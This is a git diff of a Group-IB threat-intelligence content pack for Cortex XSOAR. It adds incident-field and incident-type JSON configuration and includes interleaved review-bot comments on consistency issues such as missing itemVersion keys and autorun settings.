"useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Targeted Malware", + "GIB Compromised Card Group", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Cybercriminal Threat", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json new file mode 100644 index 000000000000..3f0ef881ef36 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Actors_Table.json 
@@ -0,0 +1,65 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Compromised Card Group"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibthreatactorstable",
+ "closeForm": true,
+ "columns": [
+ {
+ "displayName": "ID",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "id",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ },
+ {
+ "displayName": "Name",
+ "fieldCalcScript": "",
+ "isDefault": true,
+ "isReadOnly": false,
+ "key": "name",
+ "orgType": "shortText",
+ "required": false,
+ "script": "",
+ "selectValues": null,
+ "type": "shortText",
+ "width": 150
+ }
+ ],
+ "content": true,
+ "defaultRows": [
+ {}
+ ],
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibthreatactorstable",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Threat Actors Table",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "threshold": 72,
+ "type": "grid",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json
new file mode 100644
index 000000000000..8c82d13fe262
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Threat_Level.json
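Review bot: GIB_Threat_Actors_Table declares `associatedTypes` but, unlike every other field in this commit, no `systemAssociatedTypes`, so it is unclear whether the grid is bound to `GIB Compromised Card Group` the same way its sibling fields are; if the omission is not deliberate for grid fields, add `"systemAssociatedTypes": [ "GIB Compromised Card Group" ],` before `"threshold": 72,`. The `"defaultRows": [ {} ]` entry seeds the table with one empty row, which presumably is intended but is worth confirming, and `propagationLabels` appears only here and on GIB_Service_URL, so the intent behind propagating just these two fields should be stated in the pack release notes.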
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Malware" + ], + "caseInsensitive": true, + "cliName": "gibthreatlevel", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibthreatlevel", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Threat Level", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Malware" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json index 53e5378ce17a..1d9e465473f4 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Title.json @@ -26,5 +26,11 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain", + "GIB Brand Protection Phishing" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json new file mode 100644 index 000000000000..3024f796bdfa --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Update_Time.json 
@@ -0,0 +1,33 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Data Breach"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibupdatetime",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibupdatetime",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Update Time",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Data Breach"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json
new file mode 100644
index 000000000000..f5d6103a84e2
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Upload_Time.json
@@ -0,0 +1,33 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Data Breach"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibuploadtime",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibuploadtime",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB Upload Time",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Data Breach"
+ ],
+ "threshold": 72,
+ "type": "date",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
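Review bot: Both `incident_gibupdatetime` and `incident_gibuploadtime` (the two hunks on this line) omit `"itemVersion": "1.4.2"`, which every other new field in this chunk carries between `"isReadOnly"` and `"locked"`. If `itemVersion` is what ties a field to pack release 1.4.2, these two date fields should carry `"itemVersion": "1.4.2",` as well so the field set stays uniform and the next version bump touches all of them; if the key is optional, leaving it out of exactly these two still reads as an oversight rather than a choice.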
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json
new file mode 100644
index 000000000000..7ac276bae4df
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Names.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP VPN"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibvpnnames",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibvpnnames",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB VPN Names",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP VPN"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json
new file mode 100644
index 000000000000..d63715460d53
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_VPN_Sources.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Suspicious IP VPN"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibvpnsources",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibvpnsources",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB VPN Sources",
+ "neverSetAsRequired": false,
+ "openEnded": true,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Suspicious IP VPN"
+ ],
+ "threshold": 72,
+ "type": "multiSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json
index 844b30c29085..93c8bbcaf995 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Victim_IP.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Account"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json
new file mode 100644
index 000000000000..172c88acd294
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Vulnerability_Type.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibvulnerabilitytype",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibvulnerabilitytype",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Vulnerability Type",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json
new file mode 100644
index 000000000000..88660da43156
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_APT_Threat.json
@@ -0,0 +1,34 @@
+{
+ "autorun": true,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB APT Threat",
+ "layout": "GIB APT Threat Layout",
+ "locked": false,
+ "name": "GIB APT Threat",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
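Review bot: `GIB APT Threat` is added with `"autorun": true`, while almost every other incident type introduced in this commit sets `"autorun": false`; the only other exception is `GIB Compromised Account Group` later in the chunk. If `autorun` has its usual XSOAR meaning of starting the `Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution` playbook on every new incident of that type without an analyst triggering it, confirm the two exceptions are intended rather than carried over from a server export. A short sentence in the PR description naming the types that auto-run would let operators size the playbook load before they install the update.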
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json
new file mode 100644
index 000000000000..b352da1c0367
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_DDOS.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#E46BCD",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Attacks DDOS",
+ "layout": "GIB Attacks DDOS Layout",
+ "locked": false,
+ "name": "GIB Attacks DDOS",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json
new file mode 100644
index 000000000000..104379145485
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Deface.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#CE9057",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Attacks Deface",
+ "layout": "GIB Attacks Deface Layout",
+ "locked": false,
+ "name": "GIB Attacks Deface",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json
new file mode 100644
index 000000000000..d69ea11fa6b4
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Group.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Attacks Phishing Group",
+ "layout": "GIB Attacks Phishing Group Layout",
+ "locked": false,
+ "name": "GIB Attacks Phishing Group",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json
new file mode 100644
index 000000000000..c6396b161e67
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Attacks_Phishing_Kit.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#E5CF7C",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Attacks Phishing Kit",
+ "layout": "GIB Attacks Phishing Kit Layout",
+ "locked": false,
+ "name": "GIB Attacks Phishing Kit",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json
index a52729f791e5..eb9da9940960 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing.json
@@ -22,8 +22,8 @@
 "layout": "GIB Brand Protection Phishing Layout",
 "locked": false,
 "name": "GIB Brand Protection Phishing",
- "onChangeRepAlg": 2,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
 "reputationCalc": 2,
 "system": false,
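Review bot: `GIB Brand Protection Phishing` lowers `onChangeRepAlg` from 2 to 0 but leaves the context line `"reputationCalc": 2,` untouched, whereas the sibling updates to Brand Protection Phishing Kit, Compromised Account, Compromised Card, Data Breach, OSI Git Leak and OSI Public Leak set both keys to 0. Either this type is meant to keep computing indicator reputation on creation and should be called out as the one exception, or the hunk is missing a `- "reputationCalc": 2,` / `+ "reputationCalc": 0,` pair. If these two values select the indicator-reputation mode as they do elsewhere in XSOAR content (presumably 0 = none, 1 = mark, 2 = mark and enrich), then moving the rest of the pack to 0 means indicators pulled from `gibrelatedindicatorsdata` are no longer enriched automatically, which deserves one sentence in the PR description so operators know whether the postprocessing playbook now carries that enrichment. The rest of this object lies outside the hunk.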
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json
index b6f9c1d01baa..175ee4a4049e 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Brand_Protection_Phishing_Kit.json
@@ -22,10 +22,10 @@
 "layout": "GIB Brand Protection Phishing Kit Layout",
 "locked": false,
 "name": "GIB Brand Protection Phishing Kit",
- "onChangeRepAlg": 2,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 2,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json
index 583c50fe8554..198a914b60da 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account.json
@@ -27,10 +27,10 @@
 "layout": "GIB Compromised Account Layout",
 "locked": false,
 "name": "GIB Compromised Account",
- "onChangeRepAlg": 2,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 2,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json
new file mode 100644
index 000000000000..7b9c409ee3c6
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Account_Group.json
@@ -0,0 +1,34 @@
+{
+ "autorun": true,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Compromised Account Group",
+ "layout": "GIB Compromised Account Group Layout",
+ "locked": false,
+ "name": "GIB Compromised Account Group",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json
index fa71203f5d7d..9844b67bc4bb 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card.json
@@ -22,10 +22,10 @@
 "layout": "GIB Compromised Card Layout",
 "locked": false,
 "name": "GIB Compromised Card",
- "onChangeRepAlg": 2,
- "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence & Attribution",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
 "readonly": false,
- "reputationCalc": 2,
+ "reputationCalc": 0,
 "system": false,
 "version": -1,
 "weeks": 0,
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json
new file mode 100644
index 000000000000..0afd88a1e8b5
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Card_Group.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#A3C9FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Compromised Card Group",
+ "layout": "GIB Compromised Card Group Layout",
+ "locked": false,
+ "name": "GIB Compromised Card Group",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json
new file mode 100644
index 000000000000..e4c8b6d931d8
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Compromised_Mule.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Compromised Mule",
+ "layout": "GIB Compromised Mule Layout",
+ "locked": false,
+ "name": "GIB Compromised Mule",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json
new file mode 100644
index 000000000000..79f2c8164ea7
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
+ "default": false,
+ "detached": false,
+ "disabled": false,
+ "extractSettings": {
+ "fieldCliNameToExtractSettings": {
+ "gibrelatedindicatorsdata": {
+ "extractAsIsIndicatorTypeId": "",
+ "extractIndicatorTypesIDs": [],
+ "isExtractingAllIndicatorTypes": true
+ }
+ },
+ "mode": "Specific"
+ },
+ "hours": 0,
+ "hoursR": 0,
+ "id": "GIB Cybercriminal Threat",
+ "layout": "GIB Cybercriminal Threat Layout",
+ "locked": false,
+ "name": "GIB Cybercriminal Threat",
+ "onChangeRepAlg": 0,
+ "playbookId": "Incident Postprocessing - Group-IB Threat Intelligence \u0026 Attribution",
+ "readonly": false,
+ "reputationCalc": 0,
+ "system": false,
+ "version": -1,
+ "weeks": 0,
+ "weeksR": 0,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json
new file mode 100644
index 000000000000..9b757ab8514f
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentTypes/incidenttype-GIB_Cybercriminal_Threat_Actor.json
@@ -0,0 +1,34 @@
+{
+ "autorun": false,
+ "color": "#AA00FF",
+ "days": 0,
+ "daysR": 0,
